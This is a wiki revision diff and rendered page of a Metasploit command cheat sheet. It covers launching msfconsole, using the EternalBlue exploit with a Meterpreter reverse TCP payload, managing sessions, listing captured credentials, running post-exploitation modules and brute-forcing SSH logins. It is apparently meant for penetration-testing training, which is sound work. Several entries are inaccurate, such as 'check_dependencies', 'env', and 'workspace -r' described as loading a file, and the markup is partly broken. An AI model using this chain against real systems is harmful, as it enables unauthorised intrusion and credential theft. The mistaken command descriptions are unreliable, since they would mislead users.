METASPLOIT - Base Commands: Difference between revisions
No edit summary |
No edit summary |
||
| Line 4: | Line 4: | ||
To start the Metasploit Framework console, use the following command: | To start the Metasploit Framework console, use the following command: | ||
<nowiki> | <nowiki> | ||
msfconsole | msfconsole</nowiki> | ||
</nowiki> | |||
This launches the Metasploit interactive console, where you can execute various commands for penetration testing. | This launches the Metasploit interactive console, where you can execute various commands for penetration testing. | ||
| Line 13: | Line 12: | ||
To search for a specific exploit module or vulnerability in Metasploit: | To search for a specific exploit module or vulnerability in Metasploit: | ||
<nowiki> | <nowiki> | ||
search <search_term> | search <search_term></nowiki> | ||
</nowiki> | |||
For example, to search for exploits related to "Windows SMB": | For example, to search for exploits related to "Windows SMB": | ||
<nowiki> | <nowiki> | ||
search smb windows | search smb windows</nowiki> | ||
</nowiki> | |||
This will list all relevant exploits, auxiliary modules, and payloads. | This will list all relevant exploits, auxiliary modules, and payloads. | ||
| Line 28: | Line 25: | ||
To list all available Metasploit modules, use: | To list all available Metasploit modules, use: | ||
<nowiki> | <nowiki> | ||
show modules | show modules</nowiki> | ||
</nowiki> | |||
This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads. | This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads. | ||
| Line 37: | Line 33: | ||
To use an exploit module: | To use an exploit module: | ||
<nowiki> | <nowiki> | ||
use <module_path> | use <module_path></nowiki> | ||
</nowiki> | |||
For example, to use an SMB exploit: | For example, to use an SMB exploit: | ||
<nowiki> | <nowiki> | ||
use exploit/windows/smb/ms17_010_eternalblue | use exploit/windows/smb/ms17_010_eternalblue</nowiki> | ||
</nowiki> | |||
This sets the module for use in the current session. | This sets the module for use in the current session. | ||
| Line 52: | Line 46: | ||
To view the options available for a specific module: | To view the options available for a specific module: | ||
<nowiki> | <nowiki> | ||
show options | show options</nowiki> | ||
</nowiki> | |||
This displays required and optional parameters for the current module. | This displays required and optional parameters for the current module. | ||
| Line 61: | Line 54: | ||
To set the required parameters for an exploit, such as the target IP address: | To set the required parameters for an exploit, such as the target IP address: | ||
<nowiki> | <nowiki> | ||
set RHOST <target_ip> | set RHOST <target_ip></nowiki> | ||
</nowiki> | |||
Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way. | Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way. | ||
| Line 70: | Line 62: | ||
To list all available payloads for a specific exploit: | To list all available payloads for a specific exploit: | ||
<nowiki> | <nowiki> | ||
show payloads | show payloads</nowiki> | ||
</nowiki> | |||
This will show the payloads compatible with the currently selected exploit. | This will show the payloads compatible with the currently selected exploit. | ||
| Line 79: | Line 70: | ||
To select and configure a payload: | To select and configure a payload: | ||
<nowiki> | <nowiki> | ||
set PAYLOAD <payload_name> | set PAYLOAD <payload_name></nowiki> | ||
</nowiki> | |||
For example, to set a reverse TCP payload: | For example, to set a reverse TCP payload: | ||
<nowiki> | <nowiki> | ||
set PAYLOAD windows/meterpreter/reverse_tcp | set PAYLOAD windows/meterpreter/reverse_tcp</nowiki> | ||
</nowiki> | |||
You can then set specific options for the payload, like the LHOST (local host IP): | You can then set specific options for the payload, like the LHOST (local host IP): | ||
<nowiki> | <nowiki> | ||
set LHOST <local_ip> | set LHOST <local_ip></nowiki> | ||
</nowiki> | |||
### Example: | ### Example: | ||
<nowiki> | <nowiki> | ||
set LHOST 192.168.1.100 | set LHOST 192.168.1.100</nowiki> | ||
</nowiki> | |||
== Running the Exploit == | == Running the Exploit == | ||
Once the module and payload are set, you can run the exploit: | Once the module and payload are set, you can run the exploit: | ||
<nowiki> | <nowiki> | ||
exploit | exploit</nowiki> | ||
</nowiki> | |||
This will execute the exploit and attempt to gain access to the target machine. | This will execute the exploit and attempt to gain access to the target machine. | ||
| Line 113: | Line 99: | ||
If you want to run the exploit in the background without blocking the terminal: | If you want to run the exploit in the background without blocking the terminal: | ||
<nowiki> | <nowiki> | ||
exploit -j | exploit -j</nowiki> | ||
</nowiki> | |||
The `-j` flag runs the exploit as a background job. | The `-j` flag runs the exploit as a background job. | ||
| Line 122: | Line 107: | ||
To view active sessions after exploiting a target: | To view active sessions after exploiting a target: | ||
<nowiki> | <nowiki> | ||
sessions | sessions</nowiki> | ||
</nowiki> | |||
This command shows a list of all active sessions (Meterpreter or shell sessions). | This command shows a list of all active sessions (Meterpreter or shell sessions). | ||
| Line 131: | Line 115: | ||
To interact with a specific session: | To interact with a specific session: | ||
<nowiki> | <nowiki> | ||
sessions -i <session_id> | sessions -i <session_id>/nowiki> | ||
For example, to interact with session 1: | For example, to interact with session 1: | ||
<nowiki> | <nowiki> | ||
sessions -i 1 | sessions -i 1</nowiki> | ||
</nowiki> | |||
This gives you a shell or Meterpreter prompt for that session. | This gives you a shell or Meterpreter prompt for that session. | ||
| Line 146: | Line 128: | ||
To background a session and return to the main Metasploit console: | To background a session and return to the main Metasploit console: | ||
<nowiki> | <nowiki> | ||
background | background</nowiki> | ||
</nowiki> | |||
This command puts the current session in the background, allowing you to continue working on other tasks in the console. | This command puts the current session in the background, allowing you to continue working on other tasks in the console. | ||
| Line 155: | Line 136: | ||
To terminate a specific session: | To terminate a specific session: | ||
<nowiki> | <nowiki> | ||
sessions -k <session_id> | sessions -k <session_id></nowiki> | ||
</nowiki> | |||
For example: | For example: | ||
<nowiki> | <nowiki> | ||
sessions -k 1 | sessions -k 1</nowiki> | ||
</nowiki> | |||
This closes session 1. | This closes session 1. | ||
| Line 170: | Line 149: | ||
To verify if a specific vulnerability exists on the target machine, use the following command: | To verify if a specific vulnerability exists on the target machine, use the following command: | ||
<nowiki> | <nowiki> | ||
check | check</nowiki> | ||
</nowiki> | |||
This will run basic checks to determine if the target is vulnerable to the selected exploit. | This will run basic checks to determine if the target is vulnerable to the selected exploit. | ||
| Line 179: | Line 157: | ||
If you have gained access to the target system and want to list available credentials: | If you have gained access to the target system and want to list available credentials: | ||
<nowiki> | <nowiki> | ||
creds | creds</nowiki> | ||
</nowiki> | |||
This command shows all credentials (e.g., username and password pairs) captured during the session. | This command shows all credentials (e.g., username and password pairs) captured during the session. | ||
| Line 188: | Line 165: | ||
To save the current state of your Metasploit session (including all modules, options, and sessions): | To save the current state of your Metasploit session (including all modules, options, and sessions): | ||
<nowiki> | <nowiki> | ||
save | save</nowiki> | ||
</nowiki> | |||
This will save your current Metasploit environment to the default location. | This will save your current Metasploit environment to the default location. | ||
| Line 197: | Line 173: | ||
To load a saved Metasploit workspace: | To load a saved Metasploit workspace: | ||
<nowiki> | <nowiki> | ||
workspace -r <workspace_file> | workspace -r <workspace_file></nowiki> | ||
</nowiki> | |||
This will restore your saved workspace, including all settings, modules, and sessions. | This will restore your saved workspace, including all settings, modules, and sessions. | ||
| Line 206: | Line 181: | ||
To list all available workspaces: | To list all available workspaces: | ||
<nowiki> | <nowiki> | ||
workspace | workspace</nowiki> | ||
</nowiki> | |||
To create a new workspace: | To create a new workspace: | ||
<nowiki> | <nowiki> | ||
workspace -a <workspace_name> | workspace -a <workspace_name></nowiki> | ||
</nowiki> | |||
To switch between workspaces: | To switch between workspaces: | ||
<nowiki> | <nowiki> | ||
workspace <workspace_name> | workspace <workspace_name></nowiki> | ||
</nowiki> | |||
### Example: | ### Example: | ||
<nowiki> | <nowiki> | ||
workspace my_new_workspace | workspace my_new_workspace</nowiki> | ||
</nowiki> | |||
== Running Auxiliary Modules == | == Running Auxiliary Modules == | ||
To use an auxiliary module (e.g., a scanner): | To use an auxiliary module (e.g., a scanner): | ||
<nowiki> | <nowiki> | ||
use auxiliary/scanner/portscan/tcp | use auxiliary/scanner/portscan/tcp</nowiki> | ||
</nowiki> | |||
You can then set the target and run the module just like with an exploit. | You can then set the target and run the module just like with an exploit. | ||
| Line 240: | Line 210: | ||
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target: | Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target: | ||
<nowiki> | <nowiki> | ||
use post/windows/gather/enum_logged_on_users | use post/windows/gather/enum_logged_on_users</nowiki> | ||
</nowiki> | |||
This collects information about logged-on users on the Windows target. | This collects information about logged-on users on the Windows target. | ||
| Line 249: | Line 218: | ||
To get help for a specific command or module, use: | To get help for a specific command or module, use: | ||
<nowiki> | <nowiki> | ||
help <command> | help <command></nowiki> | ||
</nowiki> | |||
For example, to get help on the `sessions` command: | For example, to get help on the `sessions` command: | ||
<nowiki> | <nowiki> | ||
help sessions | help sessions</nowiki> | ||
</nowiki> | |||
This will display detailed usage instructions and options for the command. | This will display detailed usage instructions and options for the command. | ||
| Line 264: | Line 231: | ||
You can use advanced search queries to filter modules by specific parameters: | You can use advanced search queries to filter modules by specific parameters: | ||
<nowiki> | <nowiki> | ||
search type:exploit platform:windows name:ms17_010 | search type:exploit platform:windows name:ms17_010</nowiki> | ||
</nowiki> | |||
This command searches for exploits related to the MS17-010 vulnerability on Windows platforms. | This command searches for exploits related to the MS17-010 vulnerability on Windows platforms. | ||
| Line 273: | Line 239: | ||
To check if a module has any missing dependencies before use: | To check if a module has any missing dependencies before use: | ||
<nowiki> | <nowiki> | ||
check_dependencies | check_dependencies</nowiki> | ||
</nowiki> | |||
This command will list any missing libraries or files needed to run a module. | This command will list any missing libraries or files needed to run a module. | ||
| Line 282: | Line 247: | ||
To use a dictionary attack against an SSH service, for example: | To use a dictionary attack against an SSH service, for example: | ||
<nowiki> | <nowiki> | ||
use auxiliary/scanner/ssh/ssh_login | use auxiliary/scanner/ssh/ssh_login | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
set USER_FILE /path/to/usernames.txt | set USER_FILE /path/to/usernames.txt | ||
set PASS_FILE /path/to/passwords.txt | set PASS_FILE /path/to/passwords.txt | ||
run | run</nowiki> | ||
</nowiki> | |||
This runs an SSH login brute-force attack using the specified username and password lists. | This runs an SSH login brute-force attack using the specified username and password lists. | ||
| Line 295: | Line 259: | ||
To display the current environment variables in Metasploit: | To display the current environment variables in Metasploit: | ||
<nowiki> | <nowiki> | ||
env | env</nowiki> | ||
</nowiki> | |||
This will show details about the current environment, including system and framework-specific variables. | This will show details about the current environment, including system and framework-specific variables. | ||
| Line 304: | Line 267: | ||
To exit the Metasploit console: | To exit the Metasploit console: | ||
<nowiki> | <nowiki> | ||
exit | exit</nowiki> | ||
</nowiki> | |||
This command will close the Metasploit Framework console and return to the command-line prompt. | This command will close the Metasploit Framework console and return to the command-line prompt. | ||
Revision as of 16:35, 13 December 2025
Starting Metasploit Console
To start the Metasploit Framework console, use the following command:
msfconsole
This launches the Metasploit interactive console, where you can execute various commands for penetration testing.
Search for Exploits
To search for a specific exploit module or vulnerability in Metasploit:
search <search_term>
For example, to search for exploits related to "Windows SMB":
search smb windows
This will list all relevant exploits, auxiliary modules, and payloads.
Show Available Modules
To list all available Metasploit modules, use:
show modules
This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads.
Use an Exploit Module
To use an exploit module:
use <module_path>
For example, to use an SMB exploit:
use exploit/windows/smb/ms17_010_eternalblue
This sets the module for use in the current session.
Show Module Options
To view the options available for a specific module:
show options
This displays required and optional parameters for the current module.
Set Module Options
To set the required parameters for an exploit, such as the target IP address:
set RHOST <target_ip>
Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way.
Show Payloads
To list all available payloads for a specific exploit:
show payloads
This will show the payloads compatible with the currently selected exploit.
Select and Set Payload
To select and configure a payload:
set PAYLOAD <payload_name>
For example, to set a reverse TCP payload:
set PAYLOAD windows/meterpreter/reverse_tcp
You can then set specific options for the payload, like the LHOST (local host IP):
set LHOST <local_ip>
- Example:
set LHOST 192.168.1.100
Running the Exploit
Once the module and payload are set, you can run the exploit:
exploit
This will execute the exploit and attempt to gain access to the target machine.
Running the Exploit in Background
If you want to run the exploit in the background without blocking the terminal:
exploit -j
The `-j` flag runs the exploit as a background job.
Show Sessions
To view active sessions after exploiting a target:
sessions
This command shows a list of all active sessions (Meterpreter or shell sessions).
Interact with a Session
To interact with a specific session:
sessions -i <session_id>/nowiki> For example, to interact with session 1: <nowiki> sessions -i 1
This gives you a shell or Meterpreter prompt for that session.
Background a Session
To background a session and return to the main Metasploit console:
background
This command puts the current session in the background, allowing you to continue working on other tasks in the console.
Session Cleanup
To terminate a specific session:
sessions -k <session_id>
For example:
sessions -k 1
This closes session 1.
Exploit Vulnerability Verification
To verify if a specific vulnerability exists on the target machine, use the following command:
check
This will run basic checks to determine if the target is vulnerable to the selected exploit.
List Credentials
If you have gained access to the target system and want to list available credentials:
creds
This command shows all credentials (e.g., username and password pairs) captured during the session.
Save Your Progress
To save the current state of your Metasploit session (including all modules, options, and sessions):
save
This will save your current Metasploit environment to the default location.
Load a Saved Workspace
To load a saved Metasploit workspace:
workspace -r <workspace_file>
This will restore your saved workspace, including all settings, modules, and sessions.
Managing Workspaces
To list all available workspaces:
workspace
To create a new workspace:
workspace -a <workspace_name>
To switch between workspaces:
workspace <workspace_name>
- Example:
workspace my_new_workspace
Running Auxiliary Modules
To use an auxiliary module (e.g., a scanner):
use auxiliary/scanner/portscan/tcp
You can then set the target and run the module just like with an exploit.
Start a Post-Exploitation Module
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target:
use post/windows/gather/enum_logged_on_users
This collects information about logged-on users on the Windows target.
Show Help for Commands
To get help for a specific command or module, use:
help <command>
For example, to get help on the `sessions` command:
help sessions
This will display detailed usage instructions and options for the command.
Advanced Search for Exploits
You can use advanced search queries to filter modules by specific parameters:
search type:exploit platform:windows name:ms17_010
This command searches for exploits related to the MS17-010 vulnerability on Windows platforms.
Check for Dependencies
To check if a module has any missing dependencies before use:
check_dependencies
This command will list any missing libraries or files needed to run a module.
Perform a Dictionary Attack
To use a dictionary attack against an SSH service, for example:
use auxiliary/scanner/ssh/ssh_login set RHOSTS <target_ip> set USER_FILE /path/to/usernames.txt set PASS_FILE /path/to/passwords.txt run
This runs an SSH login brute-force attack using the specified username and password lists.
Display Environment Variables
To display the current environment variables in Metasploit:
env
This will show details about the current environment, including system and framework-specific variables.
Exit Metasploit Console
To exit the Metasploit console:
exit
This command will close the Metasploit Framework console and return to the command-line prompt.
